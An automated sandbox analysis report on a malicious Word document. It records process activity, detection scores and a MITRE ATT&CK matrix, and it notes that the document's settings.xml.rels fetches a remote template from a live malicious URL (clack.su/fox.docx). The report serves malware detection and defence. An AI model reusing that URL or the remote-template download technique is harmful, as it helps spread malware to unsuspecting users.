af dd 52 32 49 13 c6 35 14 24 31 27 31 ac 9b d0 90 0f 7d d7 75 9c d5 c5 78 cc 87 09 2b 2d ed 84 b7 38 0e 48 88 32 3e 0e 69 22 d7 73 ca 23 72 f8 f8 cf df fe fe db df 1e bf 3c fe f7 f1 df bf fd e3 f1 0b 82 97 5f c5 e3 cb e3 7f 1e ff f5 f8 ab 78 43 e8 01 a1 53 1a 8d 38 09 0e 6c b5 6f 7b 6b 89 bc b3 3f 01 9f bd f3 0f 1f de bd e9 7c 2a 21 5e 1a ef 7d ec 7c 3a 3b f9 d4 eb 7e 78 ff b1 73 fe f6 cd bb 13 0d d9 40 0a 10 53 a9 d5 50 90 65 a8 56 13 a4 45 34 fe 8c 18 89 7c 2d 03 3e 78 30 e6 88 02 db 1a 1a 32 d2 f7 b5 21 e7 69 db b6 6f 71 44 33 6a b1 b1 3d 49 6b b9 54 6c 3e 24 23 92 d9 7d 1a 71 46 32 6e f7 f1 ad d8 6a c1 43 72 2d 41 4b 30 55 01 26 03 38 7d 10 68 66 0d 92 64 10 11 9c d2 cc 0a 92 91 0d c4 1c f5 f1 88 46 53 ff 94 32 fc ea 0c c7 59 db 73 1c b3 01 ff 4d f8 6f 39 ce 4e 36 be 16 1a 8b 30 a7 b1 19 4c 19 8d 22 1a 54 25 e5 d5 8c 4f 23 92 0d 09 e1 55 c4 a7 29 f1 ab 9c dc 71 01 b7 ba c2 e2 7c e1 ef e1 ef e6 97 31 61 53 ab 0f ea 9d 5e 27 77 16 c0 d7 d0 88 84 14 83 f0 02 46 48 bc 60 5b 49 f4 bb d0 49 ae 04 92 a3 c6 06 34 4a 91 17 b4 8f 22 8e de 9e a0 d7 57 c0 2a 42 07 40 08 4d 39 ca 58 30 57 9e f0 85 66 36 a4 b7 b9 e0 83 24 04 b8 20 f8 ec 36 b6 39 1b c7 9f 6d b9 c4 ba c9 b4 c3 03 5b 41 78 12 1a 25 ad da 4d a1 c3 25 50 b7 84 65 34 89 ed ba e5 ea d7 e0 66 9e 61 bf 3d 79 bd 02 15 81 01 5e 90 38 a4 fd 2b 69 80 60 db 39 c9 52 73 9a d4 dc 0d be c5 6a 54 48 74 6b 6b 42 e3 30 99 58 bd 49 4a 46 c9 0d 3d 23 1c ac 60 90 21 1f dd 6b d7 38 23 3f b3 48 6b 4b 5b cd da 97 f6 a5 9d 59 13 2b 61 83 4b 9b 8e f0 80 64 97 76 90 30 72 69 cb cd 97 76 ab 7e d7 aa 5f da 9a a9 01 2e d8 67 a5 f1 00 3e b2 64 cc 02 a2 b5 ef 35 30 e2 00 73 b9 3a 07 2b a1 ce 9d e0 52 78 01 8d 83 68 1c 0a e0 37 f0 0f 03 72 7d 0d 14 4f 80 22 6b 44 63 e0 fc 08 64 e2 bb af f7 70 b3 55 ef 3b 75 c7 f3 b0 b7 eb e1 46 d3 6b f5 fb ad e6 6e d3 db 75 ea da 6c b6 2f b8 ac f4 c7 71 c0 41 82 3a 31 13 93 1b f7 b7 98 21 6c c6 26 db 2f 66 10 d5 89 1a e7 7e 62 81 cd 01 99 27 11 b8 61 cc 75 61 83 a0 7a cd d8 e7 96 Data Ascii: c15
Source: classification engineClassification label: mal68.evad.winDOCX@2/5@3/1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Desktop\~$_______19.03.docxJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{66050E71-1D72-4227-BAD7-A2759737A87A} - OProcSessId.datJump to behavior
Source: ~WRD0000.tmp.0.drOLE indicator, Word Document stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: _________19.03.docxVirustotal: Detection: 44%
Source: _________19.03.docxReversingLabs: Detection: 41%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/theme/_rels/theme1.xml.rels
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = customXml/item2.xml
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = customXml/item3.xml
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = customXml/itemProps3.xml
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = customXml/_rels/item3.xml.rels
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: ~WRD0000.tmp.0.drInitial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

barindex
Source: settings.xml.relsExtracted files from sample: http://clack.su/fox.docx
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
Windows Management Instrumentation
Path Interception1
Process Injection
1
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System4
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts3
Exploitation for Client Execution
Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media14
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive4
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
File and Directory Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
